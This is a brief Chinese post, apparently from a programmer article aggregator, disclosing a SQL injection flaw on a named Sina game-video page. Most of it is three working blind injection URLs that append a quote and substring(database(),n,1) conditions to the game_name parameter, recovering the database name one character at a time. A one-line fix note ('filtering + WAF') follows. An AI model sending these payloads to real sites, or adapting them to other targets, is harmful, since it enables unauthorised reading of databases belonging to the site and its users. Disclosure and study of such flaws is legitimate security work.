新浪某站SQL注入
程序员文章站
2022-07-09 22:04:04
http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27 and sub...
http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27 and substring(database(),1,1)='g' and 'x'=‘x
数据库第一位是g
http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27 and substring(database(),2,1)='t' and 'x'='x
第二位是t
http://kan.sina.com.cn/game/game_video?game_name=%E8%8B%B1%E9%9B%84%E8%81%94%E7%9B%9F%27 and substring(database(),3,1)='v' and 'x'='x
第三位是v
可能是土豆调用了你们的api,可能是通用?
sql注入漏洞修复方案:
过滤+waf
下一篇: 惠普发布全球首款联网打印机